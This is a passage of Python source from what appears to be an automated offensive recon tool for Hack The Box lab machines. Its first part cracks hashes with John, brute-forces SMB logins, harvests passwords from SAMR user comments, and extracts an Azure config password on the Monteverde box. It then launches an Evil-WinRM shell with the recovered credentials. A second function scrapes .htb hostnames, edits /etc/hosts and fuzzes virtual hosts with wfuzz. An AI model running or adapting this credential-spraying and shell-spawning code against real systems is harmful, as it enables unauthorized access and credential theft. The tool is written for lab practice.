in i))] if (len(num_cracked) > 0): if num_cracked[0] >= 1: passwords = [] usernames = [] for i in john_show_output: if ":" in i: passwords.append(i.split(":")[1]) usernames.append(i.split(":")[0].split("$")[3].split("@")[0]) # print(i.split(":")[1]) return zip(usernames, passwords) def check_auth(creds=None): valid_creds = [] print(f"[{fg.li_magenta}+{fg.rs}] Brute-Forcing found usernames over SMB") users = parse_users() if users: for user in users: try: smb = SMBConnection(self.target, self.target) test_login = smb.login(user, creds if creds is not None else user) except SessionError: test_login = False print(f"Testing valid login: {user}:{creds if creds is not None else user} True or False? {fg.red}{test_login}{fg.rs}") if test_login is True: valid_creds.append(user) print(f"\n[{fg.li_green}+{fg.rs}] Valid Credentials Found! {fg.li_green}{user}{fg.rs}:{fg.li_green}{creds if creds is not None else user}{fg.rs}\n") return valid_creds def query_disp_info(): domain = self.ldapper.get_domain() sdi = rpcenum.SamrDisplayInfo(self.target, domain) dump_user_info = sdi.dump(self.target, self.target) checklist = ['pass', 'Pass'] possible_credentials = [] for i in dump_user_info: if any(s in i['AdminComment'] for s in checklist): # print(i['AdminComment']) possible_credentials.append(i['AdminComment']) return possible_credentials def check_possible_creds(): check_for_creds = query_disp_info() if check_for_creds: wordlist = ' '.join(check_for_creds).split() for word in wordlist: valid_login = check_auth(creds=word) if valid_login: print("Found Creds {}:{}".format(valid_login, word)) return (valid_login[0], word) def winrm_connect(username, password): r = requests.post(f"http://{self.target}:5985/wsman", data="") if r.status_code == 401: try: dope = f"""{c.getCmd("winrm", "evilWinRM", username=username, password=password, SHELL="$SHELL")}""" print(f"[{fg.li_magenta}+{fg.rs}] Found Valid Credentials!!!") print(f"[{fg.li_magenta}+{fg.rs}] {fg.li_green}{username}:{password}{fg.rs}") print(f"[{fg.li_magenta}+{fg.rs}] Evil-WinRM !!!") print(f"[{fg.li_magenta}+{fg.rs}] " + dope) print(f"[{fg.li_magenta}+{fg.rs}] Enjoy the Shell Playboy ;) ") kwargs = {} kwargs.update(start_new_session=True) revshell = Popen(args=dope, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True, **kwargs) assert not revshell.poll() except IOError as e: print(e) exit() def monteverde(password): if os.path.exists(c.getPath("loot", "authSmbmap")): download_azure_config = c.getCmd("smb", "azure", validPass=password) print(download_azure_config) call(download_azure_config, shell=True) try: if os.path.exists(f"{os.getcwd()}/10.10.10.172-users_mhope_azure.xml"): from shutil import move move(f"{os.getcwd()}/10.10.10.172-users_mhope_azure.xml", c.getPath("loot", "azure")) except FileNotFoundError as fnf_err: print(fnf_err) if os.path.exists(c.getPath("loot", "azure")): try: import xmltodict with open(c.getPath("loot", "azure"), "rb") as azure_file: doc = xmltodict.parse(azure_file.read()) azure_pass = doc['Objs']['Obj']['Props']['S']['#text'] auth_user = check_auth(creds=azure_pass) if azure_pass: if auth_user: winrm_connect(auth_user[0], azure_pass) except FileNotFoundError as fnf_err: print("FileNotFound: {}".format(fnf_err)) def checkWinRm(): if HeresJonny() is True: r = requests.post(f"http://{self.target}:5985/wsman", data="") if r.status_code == 401: try: user_pass = dict(parseCreds()) except TypeError as te: print(te) return 1 users = [] passwords = [] for k, v in user_pass.items(): users.append(k) passwords.append(v) if len(users) != 0 and (len(passwords) != 0): winrm_connect(users[0], passwords[0]) else: print(f"[{fg.red}+{fg.rs}] No valid Credentials Found. {fg.red}Try Harder{fg.rs}") if not os.path.exists(c.getPath("loot", "lootDir")): os.makedirs(c.getPath("loot", "lootDir")) valid_password = check_auth() if valid_password: print(f"{fg.li_green}[!]{fg.rs} Found Valid Credentials!!!\n Username: {fg.li_green}{valid_password[0]}{fg.rs}\n Password: {fg.li_green}{valid_password[0]}{fg.rs}\n") print(f"[{fg.li_magenta}+{fg.rs}] Running smbmap with credentials") auth_smb_check = c.getCmd("smb", "authSmb", validPass=valid_password[0]) print(auth_smb_check) call(auth_smb_check, shell=True) if self.target == "10.10.10.172": autopwn_banner = r""" _______ __ ______ | _ |.--.--.| |_.-----.| __ \.--.--.--.-----. | || | || _| _ || __/| | | | | |___|___||_____||____|_____||___| |________|__|__| MONTEVERDE """ print(f"{fg.li_magenta}{autopwn_banner}{fg.rs}") monteverde(valid_password[0]) else: creds_ = check_possible_creds() if creds_: winrm_connect(creds_[0], creds_[1]) checkWinRm()
def getLinks(self): """Grab all links from web server homepage i.e. http://IP:PORT/ and look for .htb domain names. If a .htb domain is found, add the hostname to the /etc/hosts file and then proceed to fuzz the hostname for virtual hostname routing using wfuzz. If a valid sub-hostname is found, add the domain to the /etc/hosts file as well using python_hosts library merge_names parameter.(Thanks for adding this feature! @jonhadfield)""" def cmdline(command): process = Popen(args=command, stdout=PIPE, shell=True) return process.communicate()[0] np = nmapParser.NmapParserFunk(self.target) np.openPorts() http_ports = np.http_ports cmd_info = "[" + fg.li_green + "+" + fg.rs + "]" cmd_info_orange = "[" + fg.li_yellow + "+" + fg.rs + "]" c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if len(http_ports) != 0: if not os.path.exists(c.getPath("web", "webDir")): os.makedirs(c.getPath("web", "webDir")) for hp in http_ports: try: url = f"""http://{self.target}:{hp}""" wfuzzReport = c.getPath("web", "wfuzzReport", port=hp) page = requests.get(url, verify=False, timeout=(5, 30)) data = page.text soup = BeautifulSoup(data, "html.parser") # links = [] htb = [".htb"] source_domain_name = [] for link in soup.find_all(text=lambda x: ".htb" in x): matches = re.findall( r"(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{3}", link) for x in matches: if any(s in x for s in htb): source_domain_name.append(x) for link in soup.find_all('img'): src_matches = link.get('src') matches = re.findall( r"(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{3}", src_matches) for x in matches: if any(s in x for s in htb): source_domain_name.append(x) except requests.exceptions.ConnectionError as ce_error: print("Connection Error: ", ce_error) continue except requests.exceptions.Timeout as t_error: print("Connection Timeout Error: ", t_error) continue except requests.exceptions.RequestException as req_err: print("Some Ambiguous Exception:", req_err) continue if source_domain_name and self.hostnames: all_hostnames = list( set(source_domain_name).union(set(self.hostnames))) if source_domain_name and not self.hostnames: all_hostnames = source_domain_name if self.hostnames and not source_domain_name: all_hostnames = self.hostnames if all_hostnames: vhostnames = [ i.lower() for i in sorted(set(all_hostnames)) ] vhost_log = open(c.getPath("web", "vhostnames"), "a+") for vh in vhostnames: vhost_log.write(vh) vhost_log.close() print( f"""{cmd_info_orange} {fg.li_magenta}Found{fg.rs} {fg.cyan}{vhostnames}{fg.rs} in {fg.li_red}The Source!{fg.rs} http://{self.target}:{hp}""" ) print( f"""{cmd_info} {fg.li_magenta}Adding{fg.rs} {fg.li_cyan} {vhostnames}{fg.rs} to /etc/hosts file""" ) hosts = Hosts(path="/etc/hosts") new_entry = HostsEntry(entry_type="ipv4", address=self.target, names=vhostnames) hosts.add([new_entry], merge_names=True) hosts.write() base_domain_name = [] for d in vhostnames: self.htb_source_domains.append(d) if d.count('.') == 1: base_domain_name.append(d) try: import wfuzz from tqdm import tqdm tk5 = c.getPath("wordlists", "top5Ksubs") print( f"""{cmd_info} wfuzz -z file,{tk5} -u {base_domain_name[0]}:{hp} -H 'Host: FUZZ.{base_domain_name[0]}:{hp}'""" ) print( f"{fg.li_yellow}Wfuzz's STDOUT is Hidden to prevent filling up Terminal. Desired Response Codes are unpredictable during initial fuzz session. {fg.rs} STDOUT will be written to {fg.li_magenta}{wfuzzReport}{fg.rs}" ) str_domain = f"""{base_domain_name[0]}:{hp}""" fuzz_domain = f"""FUZZ.{base_domain_name[0]}:{hp}""" wordlist_lines = 4997 with tqdm(total=wordlist_lines) as pbar: for r in wfuzz.fuzz( url=str_domain, hc=[404, 400], payloads=[("file", dict(fn=tk5))], headers=[("Host", fuzz_domain)], printer=(wfuzzReport, "raw"), ): # print(r) pbar.update() pbar.set_description_str( desc=f"{fg.li_yellow}wfuzz{fg.rs}") # pass except Exception as e: print(e) if os.path.exists(wfuzzReport): awk_print = "awk '{print $6}'" check_occurances = f"""sed -n -e 's/^.*C=//p' {wfuzzReport} | grep -v "Warning:" | {awk_print} | sort | uniq -c""" response_num = [ i.strip() for i in cmdline( check_occurances).decode("utf-8").split("\n") ] res_filt = [ i.split() for i in sorted(set(response_num)) ] filt2arr = [ c for c in res_filt if len(c) != 0 and int(c[0]) < 5 ] status_code = [] if len(filt2arr) != 0 and (len(filt2arr) < 5): # print(filt2arr) for htprc in filt2arr: status_code.append(htprc[1]) if len(status_code) != 0 and len(status_code) <= 5: for _ in status_code: # print(status_code) awk_print = "awk '{print $9}'" get_domain_cmd = f"""grep '{_} Ch' {wfuzzReport} | {awk_print}""" get_domains = (check_output( get_domain_cmd, shell=True, stderr=STDOUT).rstrip().decode( "utf-8").replace('"', "")) subdomains = [] if get_domains is not None: subdomains.append(get_domains) sub_d = "{}.{}".format( subdomains[0], base_domain_name[0]) print( f"""{cmd_info_orange}{fg.li_blue} Found Subdomain!{fg.rs} {fg.li_green}{sub_d}{fg.rs}""" ) print( f"""{cmd_info}{fg.li_magenta} Adding{fg.rs} {fg.li_cyan}{sub_d}{fg.rs} to /etc/hosts file""" ) hosts = Hosts(path="/etc/hosts") new_entry = HostsEntry( entry_type="ipv4", address=self.target, names=[sub_d], ) hosts.add([new_entry], merge_names=True) hosts.write() self.htb_source_domains.append(sub_d)
def getOpenPorts(self): """Helper function to call the lib/NmapParserFunk Class.""" np = nmapParser.NmapParserFunk(self.target) np.openPorts()